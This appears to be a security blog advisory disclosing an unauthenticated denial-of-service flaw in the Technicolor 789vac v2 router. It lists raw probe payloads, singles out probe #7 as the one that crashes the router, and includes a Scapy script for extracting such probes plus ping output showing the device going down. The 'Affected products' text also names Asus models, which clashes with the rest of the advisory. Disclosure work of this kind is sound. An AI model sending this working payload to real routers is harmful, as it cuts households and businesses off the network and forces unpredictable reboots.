KaiserSource@home:~$

Archive

About

RSS

Router Technicolor 789vac v2

Affected products

We have not yet tested Asus models other than those listed. However we suspect it may also work on other models with similar firmware version higher than 2.0.0.

    Technicolor 789vac v2

Overview

An issue was discovered in the Technicolor 789vac router running firmware AGTOT 2.2.3. An unauthenticated remote attacker can send a crafted probe or perform a service detection scan, targeting the iperf service on port 5001. This triggers an immediate failure in the router’s network stack, causing disruption of all network connectivity (wired and wireless) and resulting in a full router reboot.

This PoC can result in a DoS.

Given the vendor’s policies, we wont’t show the Source Code of the binary scripts. However, we’ll inspect the web page source. We’ll provide the insights before and after the procedure.

Strategy

We analyzed the improper behaviours. Simultaneously, we captured the network traffic log all packets exchanged. We saved the captured data in PCAPNG format for further analysis. Collect all the probes analyzing pcapng (e.g. Scapy) We filtered precisely the crashing cause by sending one by one and then crafted the exploit.

Here’s the list of the probes collected:

Probe #1: b'\x01\x00\x00\xfd\xce\xfa\x0b\xb0\xa0\x00\x00\x00MMS\x14\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x12\x00\x00\x00\x01\x00\x03\x00\xf0\xf0\xf0\xf0\x0b\x00\x04\x00\x1c\x00\x03\x00N\x00S\x00P\x00l\x00a\x00y\x00e\x00r\x00/\x009\x00.\x000\x00.\x000\x00.\x002\x009\x008\x000\x00;\x00 \x00{\x000\x000\x000\x000\x00A\x00A\x000\x000\x00-\x000\x00A\x000\x000\x00-\x000\x000\x00a\x000\x00-\x00A\x00A\x000\x00A\x00-\x000\x000\x000\x000\x00A\x000\x00A\x00A\x000\x00A\x00A\x000\x00}\x00\x00\x00\xe0m\xdf_'
Probe #2: b'\x00\x00\x00\x1f\x00\x00\x00\x00\x00\x00\x00\x0cGetClassName\x00\x00\x00\x02\x04\x00\x00\x00\x00\x01\x00'
Probe #3: b'\r\n\r\n'
Probe #4: b'GET / HTTP/1.0\r\n\r\n'
Probe #5: b'OPTIONS / HTTP/1.0\r\n\r\n'
Probe #6: b'OPTIONS / RTSP/1.0\r\n\r\n'
Probe #7: b'\x80\x00\x00(r\xfe\x1d\x13\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x86\xa0\x00\x01\x97|\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
Probe #8: b'\x00\x1e\x00\x06\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00\x07version\x04bind\x00\x00\x10\x00\x03'
Probe #9: b'\x00\x0c\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00'
Probe #10: b'HELP\r\n'
Probe #11: b'\x16\x03\x00\x00S\x01\x00\x00O\x03\x00?G\xd7\xf7\xba,\xee\xea\xb2`~\xf3\x00\xfd\x82{\xb9\xd5\x96\xc8w\x9b\xe6\xc4\xdb<=\xdbo\xef\x10n\x00\x00(\x00\x16\x00\x13\x00\n\x00f\x00\x05\x00\x04\x00e\x00d\x00c\x00b\x00a\x00`\x00\x15\x00\x12\x00\t\x00\x14\x00\x11\x00\x08\x00\x06\x00\x03\x01\x00'

Probe scraping:

from scapy.all import rdpcap


file_path = 'crash.pcapng'  # Replace with your file path
packets = rdpcap(file_path)

target_ip = "ip_addr" 
target_port = 5001

probes = []
for packet in packets:
    if packet.haslayer("TCP") and packet["TCP"].dport == target_port and packet["IP"].dst == target_ip:
        payload = bytes(packet["TCP"].payload)
        if payload and payload not in probes: 
            probes.append(payload)

for i, probe in enumerate(probes, start=1):
    print(f"Probe #{i}: {probe}")

The probe #7 is the chosen one that leads Techicolor 789vac failure. The Router becomes unreachable from every service.

64 bytes from 192.168.1.1: icmp_seq=183 ttl=64 time=0.401 ms
64 bytes from 192.168.1.1: icmp_seq=184 ttl=64 time=0.348 ms
64 bytes from 192.168.1.1: icmp_seq=185 ttl=64 time=0.384 ms
64 bytes from 192.168.1.1: icmp_seq=186 ttl=64 time=0.373 ms
64 bytes from 192.168.1.1: icmp_seq=187 ttl=64 time=0.335 ms
64 bytes from 192.168.1.1: icmp_seq=188 ttl=64 time=0.349 ms
64 bytes from 192.168.1.1: icmp_seq=189 ttl=64 time=4.66 ms
64 bytes from 192.168.1.1: icmp_seq=190 ttl=64 time=0.518 ms
64 bytes from 192.168.1.1: icmp_seq=191 ttl=64 time=0.385 ms
64 bytes from 192.168.1.1: icmp_seq=192 ttl=64 time=0.418 ms



From 192.168.1.2 icmp_seq=247 Destination Host Unreachable
From 192.168.1.2 icmp_seq=248 Destination Host Unreachable
From 192.168.1.2 icmp_seq=249 Destination Host Unreachable

Moreover, this will result in an unintended system reboot. The time required for the system to reboot is unpredictable, ranging from a few seconds up to 10 minutes after the actor has exploited the system.